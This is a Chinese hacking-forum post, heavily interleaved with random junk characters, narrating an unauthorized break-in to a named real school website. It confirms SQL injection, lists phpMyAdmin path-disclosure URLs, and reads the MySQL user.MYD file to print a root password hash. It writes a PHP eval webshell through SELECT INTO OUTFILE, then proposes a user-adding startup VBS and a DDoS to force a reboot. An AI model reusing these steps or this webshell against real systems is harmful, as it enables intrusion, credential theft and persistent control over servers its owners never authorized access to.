第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏1 y$ c2 E! a* s$ R5 l# M0 q
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
1 Z" c( ]' K% [) e0 G, t$ L: i7 M- k' m5 \4 K2 ^3 t1 {
( J ] B5 x. e
: c' {# Y0 n* G2 `5 S1 ]5 N
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 , e$ d, I: |; g
( X0 G) u& a, b
那么想可以直接写入shell ,getshell有几个条件: w/ X; U0 z; x6 L/ |
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF # D% s( C4 x; k6 Z
( P$ V; `1 ]+ N9 }2 R4 b0 f4 }
试着爆绝对路径: + L6 C" T5 a( o! |. J
1./phpMyAdmin/index.php?lang[]=1 0 s* f1 D; q0 U/ U0 h2 |' b! K* Q
2./phpMyAdmin/phpinfo.php
+ E! Y3 N9 [- [5 [; q' M2 Z# T3./load_file()
, f. p( P8 L* I& m1 T4./phpmyadmin/themes/darkblue_orange/layout.inc.php
6 v; f$ m! C, b L# O5./phpmyadmin/libraries/select_lang.lib.php
* G0 h4 S e, [' D6 P5 n6 E$ U6./phpmyadmin/libraries/lect_lang.lib.php : h% M9 D0 v3 q9 |% k
7./phpmyadmin/libraries/mcrypt.lib.php 7 p9 d# F& O& n% P5 e4 @% y! U0 Q
8./phpmyadmin/libraries/export/xls.php
6 O/ n) N; ^" a* \1 ~% m8 p
* P* M3 ~- b) u" s) u) p均不行........................... 0 Z8 a6 g( |% U7 P
! o- `/ n2 h" I7 [' G# ~御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 5 ~4 C" @5 Q$ y2 E4 u, M ~9 q
: h; Z7 q9 n- M0 s1 r
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 8 I" }. P8 l' P, ~
. N! l) X' c9 @# y5 G3 ]默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 3 g3 c( ~3 U0 z0 H' C v7 x
% Q* J4 Z5 e1 [9 S+ u+ z+ Q敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
- _* F1 E9 m3 W& s2 X# s: y
% ?/ l, x$ A* |. n2 R8 h; H想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
( \9 ]" L! G6 S9 |9 v& q K) y$ y. u
W! r% U2 }1 G) {1 Zhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
( O% t6 {6 ?0 }1 B! \9 L: n5 F1 ^4 ^6 ~' t( v6 L
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 4 p% G( F+ ?$ K. S
0 t6 n; p7 X5 F% ^2 u
成功读到root密码: F' y9 g6 S" E" B! n- C6 g
& u0 Q3 d+ W7 A g17---- r(0072)
& {% E/ R* A0 G18---- o(006f)
# K6 K+ ]* |9 {& Q0 ~* Q5 p19---- o(006f) * `' C* ~7 \# E4 b1 G
20---- t(0074) ) F8 ]! u Y& p& c# T/ j4 u
21---- *(002a) ! I3 t, y9 |+ k m" Y
22---- 8(0038)
* f& @7 A; }% a+ A# G2 i$ O23---- 2(0032) $ }: H' c3 D3 e
24---- E(0045)
) `: _4 h- q$ f, V! i/ c25---- 1(0031)
0 m0 x8 Y7 n) l: n: S26---- C(0043) # r. q5 x2 l0 |* U; f: }
27---- 5(0035) * Y' X- U0 M5 S' x. i- ?2 a
28---- 8(0038) 3 K Z" w# e1 k1 ^4 s- k
29---- 2(0032)
% I* P- n; |! D9 e8 e30---- 8(0038)
/ {4 \$ @/ X' B+ i( D31---- A(0041) ( r" j# r$ q! \0 y' s
32---- 9(0039)
3 m! [" g4 A6 h$ p" {33---- B(0042) 2 U* h) V6 s; i7 v/ K6 `2 S c! e
34---- 5(0035)
1 X2 I& ?, i! A35---- 4(0034)
7 X6 }$ ]8 Y' v" U36---- 8(0038) , D. [& a8 u: ?( a F
37---- 6(0036)
$ |+ i+ Z( v) c0 r% J: I+ v0 i38---- 4(0034) " O9 j* i9 V$ U4 J# e: [; l
39---- 9(0039)
& Y' s8 a3 b- r" E e3 z# v! T* r40---- 1(0031)
( z% ] R& q% G6 c: Z0 t8 m( `41---- 1(0031)
9 k$ `! E7 |3 d6 z& H42---- 5(0035)
7 E8 x4 Y0 K+ X7 O: y6 }43---- 3(0033) # ^" R r x, g( o. X/ Q) }
44---- 5(0035)
+ z- y4 m( q$ }4 }4 c45---- 9(0039) , e6 N1 n" q- r" ~5 E
46---- 8(0038) 1 w' g, I# B+ P4 G1 o# I
47---- F(0046) w( Z* c. T- ^2 w
48---- F(0046) # Z; Z$ ]' v% d: g/ J
49---- 4(0034) ' P, o2 q1 k+ w$ c) E: S
50---- F(0046) 1 m3 Z* @! S1 z8 r5 e
51---- 0(0030)
! V! l( D/ T" x e/ B8 c/ H) J52---- 3(0033) . s* O" Y& M7 I: N, c
53---- 2(0032) 4 U) U( X5 e) ^8 G, R- o- h1 ~
54---- A(0041) 3 c9 p, \1 g/ r1 a' V
55---- 4(0034) & j9 |7 M* n i* _) P: n
56---- A(0041) 6 b* F0 ~- M, J( C2 o
57---- B(0042)
, k! _: ?# N1 F6 c58---- *(0044)
2 I7 H' Q7 u" F+ E59---- *(0035) ) `, F. E+ G7 P& X. X
60---- *(0041)
+ p8 Q0 S* M. \: p8 R. c- Z7 T' U61---- *0032)
# t( \1 g# ^9 @
9 k! {3 g3 r# n% H. [" l& t. |! }5 e解密后成功登陆phpmyamin
, O" D; c' s& M; K& _, l# w
, j6 I& J4 D. v9 N! d" o a4 c$ e; m) U
' Y( V. V2 ~& h) w; M, P
6 N. {+ e: w9 O9 N找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' ) F; Q6 k2 _' r5 O. \. C
6 Y3 J" ]# e* |( }2 |成功执行,拿下shell,菜刀连接:
+ P: q+ m/ m1 r- Y7 d- l( a" i4 n) l1 S7 p: u- r1 h' M
服务器不支持asp,aspx,php提权无果...................
( ?4 p1 \/ E Y) a2 H
* i$ n9 [, n- o+ w* m7 a" G4 Y0 I7 \但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
0 H, S5 R4 h) |服务器上已经有个隐藏帐号了
; F& R/ R O: D: l P别名 administrators; }+ v) j0 S1 A3 b P) F
注释 管理员对计算机/域有不受限制的完全访问权
& U: {5 [2 R. x成员
( Q' b- a O/ N4 s-------------------------------------------------------------------------------
4 M. c$ t: E- ?4 I* Badmin
- e7 A6 g% P6 E% j6 y% o" r; O; @0 H3 rAdministrator( X3 k6 q1 f; `+ I, ^
slipper$( `) s; V6 O1 Q5 p
sqluser
8 @" M x, X% [/ E! F3 K命令成功完成。 & r+ {" c w/ y* c! i. I+ J) f
$ _& |4 z3 K$ J6 X; u$ e) H服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
% d$ p2 ~# ?: X; w9 l: M0 v( g$ R+ o1 X$ u- ~
ddos服务器重启,不然就只能坐等服务器重启了...............................
, A; y& N4 F4 u4 P
. n0 y' X3 } A- h3 q 4 } g3 i1 b* d6 r/ T- P/ \7 ]& R
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
